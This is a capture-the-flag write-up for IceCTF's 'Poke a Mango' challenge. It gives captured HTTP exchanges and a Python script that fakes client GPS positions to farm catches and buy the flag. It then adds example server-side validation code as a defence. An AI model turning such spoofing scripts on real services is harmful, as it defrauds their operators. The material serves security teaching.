IceCTF – Poke a Mango
This challenge gives us an APK file, pokeamango.apk, through a download link.
Analysis
This Android application is a Pokemon GO lookalike: you capture mangoes, and once you have captured 151 of them you can buy the flag. Decompiling the APK with jadx-gui shows the HTTP requests the app makes, which are the ones we need. A first request lists the mangoes near the position the client reports:
REQUEST:
POST /mango/list HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 51
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

lat=41.0777778&long=1.1799998&uuid=8fb6f1840fee5a88

RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:50:54 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 459178f855833c1d-CDG
Content-Length: 866

{"mangos":[{"lat":41.0775367,"lng":1.1778177},{"lat":41.07847469999999,"lng":1.1795604},{"lat":41.0794147,"lng":1.1805652},{"lat":41.07758399999999,"lng":1.1782649},{"lat":41.0791775,"lng":1.1795028},{"lat":41.0782402,"lng":1.1797446},{"lat":41.0774597,"lng":1.1774596},{"lat":41.0781927,"lng":1.1809616},{"lat":41.0764728,"lng":1.1798654},{"lat":41.0764401,"lng":1.1799138},{"lat":41.076082,"lng":1.179158},{"lat":41.077837,"lng":1.1797852},{"lat":41.07882900000001,"lng":1.17955},{"lat":41.076564,"lng":1.179783},{"lat":41.0772666,"lng":1.1797385},{"lat":41.0773042,"lng":1.1791576},{"lat":41.07715779999999,"lng":1.1810705},{"lat":41.076599,"lng":1.180543},{"lat":41.0767187,"lng":1.1809404},{"lat":41.07724479999999,"lng":1.178256}],"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}
And a second request that captures one of them, sending both the client's current position and the mango's position:
REQUEST:
POST /mango/catch HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 97
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

curLat=41.0777778&curLong=1.1799998&mangoLat=41.0775367&mangoLong=1.1778177&uuid=8fb6f1840fee5a88

RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:53:13 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 45917c57f3523bf3-CDG
Content-Length: 156

{"message":"Mango Caught!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}
With these two requests we can capture 151 mangoes without moving at all, because the server accepts the client-supplied position (curLat/curLong) as-is and never checks it against anything. Once the count reaches 151, the flag is bought with this request:
REQUEST:
POST /store/flag HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 21
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

uuid=8fb6f1840fee5a88

RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 10:53:00 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 4591d3efe0ae3c0b-CDG
Content-Length: 208

{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}
Here is the Python script I wrote to get the flag (it also polls a /mango/count endpoint to know when 151 has been reached):
#!/usr/bin/env python
# coding: utf8
import requests
import json
import sys

UUID = "8fb6f1840fee5a77"
BASE_URL = "http://pokeamango.vuln.icec.tf:80"
COOKIES = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
HEADERS = {"Accept": "*/*",
           "Origin": "file://",
           "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36",
           "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
           "Accept-Encoding": "gzip, deflate",
           "Accept-Language": "en-US",
           "X-Requested-With": "tf.icec.pokeamango",
           "Connection": "close"}


def post(path, data):
    # Every endpoint is a form POST with the same headers and cookie;
    # return the body on HTTP 200 and 1 on any other status
    r = requests.post(BASE_URL + path, headers=HEADERS, cookies=COOKIES, data=data)
    if r.status_code == 200:  # success
        return r.text
    return 1  # error


def getCoordinates(clat, clng):
    # /mango/list: mangoes near the position we claim to be at
    return post("/mango/list", {"lat": "%s" % clat, "long": "%s" % clng, "uuid": UUID})


def getMango(clat, clng, lat, lng):
    # /mango/catch: the server trusts curLat/curLong as sent
    return post("/mango/catch", {"curLat": "%s" % clat, "curLong": "%s" % clng,
                                 "mangoLat": "%s" % lat, "mangoLong": "%s" % lng,
                                 "uuid": UUID})


def getCount():
    # /mango/count: how many mangoes this uuid has caught so far
    return post("/mango/count", {"uuid": UUID})


def getFlag():
    # /store/flag: returns the flag once 151 mangoes are caught
    return post("/store/flag", {"uuid": UUID})


for j in range(100):
    for i in range(0, 999):
        clat = "41.0%s77778" % i  # current lat
        clng = "1.1%s99998" % i   # current long
        count = getCount()
        while count == 1:  # because the web is unstable
            count = getCount()
        if count[9:12] == '151':  # the three digits after the {"count": prefix
            print(getFlag())
            sys.exit(0)
        response = getCoordinates(clat, clng)
        if response != 1:
            data = json.loads(response)
            for mango in data["mangos"]:
                lat = mango["lat"]
                lng = mango["lng"]
                print("sending lat %s and lng %s" % (lat, lng))
                get = getMango(clat, clng, lat, lng)
                while get == 1:  # because the web is unstable
                    get = getMango(clat, clng, lat, lng)
Example script execution:
$ python script.py
sending lat 41.0663526 and lng 1.1709858
sending lat 41.0665607 and lng 1.1705412
sending lat 41.0962592 and lng 1.2006501
sending lat 41.06087 and lng 1.16179
...
sending lat 41.0839905 and lng 1.1853429
sending lat 41.0853402 and lng 1.183156
sending lat 41.0839701 and lng 1.1853559
{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE3NyJ9.7b1ZlrmCDiWimU2JdKnfkbwuUZkoOTvvIYU1x9JTUJ4"}
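The flag itself says what was missing: server-side checking. As an added example (not part of this writeup and not the challenge's own server code), here is what that checking could look like in Python: the server remembers which mangoes it issued to each uuid in /mango/list, accepts a /mango/catch only for an issued mango that the player is within range of, rejects jumps between requests that are physically implausible, lets each issued mango be caught once, and keeps the count itself. The 50 m catch range, the 10 m/s speed limit, the MangoServer class and the walk-through timings are assumptions; the coordinates are the player position and the first two mangoes from the /mango/list exchange above.

```python
import math

# Assumed game rules for this example (the challenge published none):
MAX_CATCH_DISTANCE_M = 50.0   # player must be within 50 m of the mango
MAX_SPEED_M_PER_S = 10.0      # faster than 10 m/s between requests is implausible
REQUIRED_MANGOES = 151        # from the challenge: the flag costs 151 mangoes


def haversine_m(lat1, lng1, lat2, lng2):
    """Great-circle distance in metres between two (lat, lng) points in degrees."""
    earth_radius_m = 6371000.0
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lng2 - lng1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * earth_radius_m * math.asin(math.sqrt(a))


class MangoServer:
    """Server-side state: what each uuid was offered, what it caught, where it last was."""

    def __init__(self):
        self.issued = {}     # uuid -> set of (lat, lng) handed out by /mango/list
        self.caught = {}     # uuid -> number of accepted catches
        self.last_seen = {}  # uuid -> (timestamp, lat, lng) of the last accepted request

    def _movement_ok(self, uuid, lat, lng, now):
        # Reject a reported position the player could not have reached in time
        prev = self.last_seen.get(uuid)
        if prev is None:
            return True
        t0, lat0, lng0 = prev
        dt = now - t0
        if dt <= 0:
            return False
        return haversine_m(lat0, lng0, lat, lng) / dt <= MAX_SPEED_M_PER_S

    def list_mangoes(self, uuid, lat, lng, now, mangoes):
        """/mango/list: record exactly which mangoes this player was offered."""
        if not self._movement_ok(uuid, lat, lng, now):
            return "rejected: implausible movement"
        self.issued[uuid] = {(m["lat"], m["lng"]) for m in mangoes}
        self.last_seen[uuid] = (now, lat, lng)
        return "ok"

    def catch(self, uuid, cur_lat, cur_lng, mango_lat, mango_lng, now):
        """/mango/catch: only an issued mango, in range, from a plausible position."""
        if (mango_lat, mango_lng) not in self.issued.get(uuid, set()):
            return "rejected: mango was not issued to this player"
        if haversine_m(cur_lat, cur_lng, mango_lat, mango_lng) > MAX_CATCH_DISTANCE_M:
            return "rejected: too far from mango"
        if not self._movement_ok(uuid, cur_lat, cur_lng, now):
            return "rejected: implausible movement"
        self.issued[uuid].discard((mango_lat, mango_lng))  # each issued mango is catchable once
        self.caught[uuid] = self.caught.get(uuid, 0) + 1
        self.last_seen[uuid] = (now, cur_lat, cur_lng)
        return "Mango Caught!"

    def can_buy_flag(self, uuid):
        """/store/flag: the count lives on the server, never in the client."""
        return self.caught.get(uuid, 0) >= REQUIRED_MANGOES


# Constructed walk-through: player position and first two mangoes from the
# /mango/list exchange in the writeup; timestamps are assumed seconds.
PLAYER = (41.0777778, 1.1799998)
MANGO_1 = (41.0775367, 1.1778177)
MANGO_2 = (41.07847469999999, 1.1795604)


def demo():
    s = MangoServer()
    uuid = "example-uuid"
    results = []
    results.append(s.list_mangoes(uuid, PLAYER[0], PLAYER[1], 0,
                                  [{"lat": MANGO_1[0], "lng": MANGO_1[1]},
                                   {"lat": MANGO_2[0], "lng": MANGO_2[1]}]))
    # the catch exactly as the challenge client sent it: about 185 m from the mango
    results.append(s.catch(uuid, PLAYER[0], PLAYER[1], MANGO_1[0], MANGO_1[1], 5))
    # a coordinate the server never issued
    results.append(s.catch(uuid, PLAYER[0], PLAYER[1], 41.0, 1.0, 6))
    # walk to the mango (about 185 m in 60 s) and catch it legitimately
    results.append(s.catch(uuid, MANGO_1[0], MANGO_1[1], MANGO_1[0], MANGO_1[1], 60))
    # replaying the same catch: that mango is no longer issued
    results.append(s.catch(uuid, MANGO_1[0], MANGO_1[1], MANGO_1[0], MANGO_1[1], 61))
    # jumping about 180 m to the second mango in 2 s is rejected as teleporting
    results.append(s.catch(uuid, MANGO_2[0], MANGO_2[1], MANGO_2[0], MANGO_2[1], 62))
    # the same move over 60 s is accepted
    results.append(s.catch(uuid, MANGO_2[0], MANGO_2[1], MANGO_2[0], MANGO_2[1], 120))
    results.append(s.can_buy_flag(uuid))
    return results, s.caught.get(uuid, 0)


if __name__ == "__main__":
    for line in demo()[0]:
        print(line)
```

Note that with these rules the very first /mango/catch shown in the writeup, sent from the listed position to a mango about 185 m away, would already be refused, and the script's coordinate hopping would trip the movement check on every iteration. The count check is the important one for the flag purchase: whatever the client claims, /store/flag only consults the server's own tally.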
Cheers!